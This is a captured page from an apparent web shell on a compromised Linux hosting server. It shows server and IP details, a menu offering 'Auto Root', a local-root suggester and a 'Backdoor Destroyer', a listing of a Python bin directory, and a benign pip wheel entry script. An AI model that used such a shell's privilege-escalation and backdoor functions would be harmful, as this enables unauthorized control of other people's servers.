Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.198
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
python39 /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
2to3
108
B
-rwxr-xr-x
2025-06-19 15:40
idle3
106
B
-rwxr-xr-x
2025-06-19 15:40
idle3.9
106
B
-rwxr-xr-x
2025-06-19 15:40
lswsgi
102.8
KB
-rwxr-xr-x
2024-05-31 17:48
msgfmt3.9.py
7.42
KB
-rwxr-xr-x
2025-06-03 22:17
msgfmt3.py
7.42
KB
-rwxr-xr-x
2025-06-03 22:17
pathfix.py
6.64
KB
-rwxr-xr-x
2025-06-03 22:17
pip
661
B
-rwxr-xr-x
2023-11-14 01:17
pip-3
661
B
-rwxr-xr-x
2023-11-14 01:17
pip-3.9
661
B
-rwxr-xr-x
2023-11-14 01:17
pip3
661
B
-rwxr-xr-x
2023-11-14 01:17
pip3.9
661
B
-rwxr-xr-x
2023-11-14 01:17
pydoc3
91
B
-rwxr-xr-x
2025-06-19 15:40
pydoc3.9
91
B
-rwxr-xr-x
2025-06-19 15:40
pygettext3.9.py
21.04
KB
-rwxr-xr-x
2025-06-03 22:17
pygettext3.py
21.04
KB
-rwxr-xr-x
2025-06-03 22:17
python3
15.59
KB
-rwxr-xr-x
2025-06-19 15:41
python3-config
171
B
-rwxr-xr-x
2025-06-19 15:40
python3-debug
15.59
KB
-rwxr-xr-x
2025-06-19 15:41
python3.9
15.59
KB
-rwxr-xr-x
2025-06-19 15:41
python3.9-config
171
B
-rwxr-xr-x
2025-06-19 15:40
python3.9-x86_64-config
3.42
KB
-rwxr-xr-x
2025-06-19 15:32
python3.9d
15.59
KB
-rwxr-xr-x
2025-06-19 15:41
python3.9d-config
173
B
-rwxr-xr-x
2025-06-19 15:40
python3.9d-x86_64-config
3.41
KB
-rwxr-xr-x
2025-06-19 15:29
wheel
964
B
-rwxr-xr-x
2024-03-07 11:20
Save
Rename
#!/opt/alt/python39/bin/python3 # EASY-INSTALL-ENTRY-SCRIPT: 'wheel==0.37.0','console_scripts','wheel' import re import sys # for compatibility with easy_install; see #2198 __requires__ = 'wheel==0.37.0' try: from importlib.metadata import distribution except ImportError: try: from importlib_metadata import distribution except ImportError: from pkg_resources import load_entry_point def importlib_load_entry_point(spec, group, name): dist_name, _, _ = spec.partition('==') matches = ( entry_point for entry_point in distribution(dist_name).entry_points if entry_point.group == group and entry_point.name == name ) return next(matches).load() globals().setdefault('load_entry_point', importlib_load_entry_point) if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) sys.exit(load_entry_point('wheel==0.37.0', 'console_scripts', 'wheel')())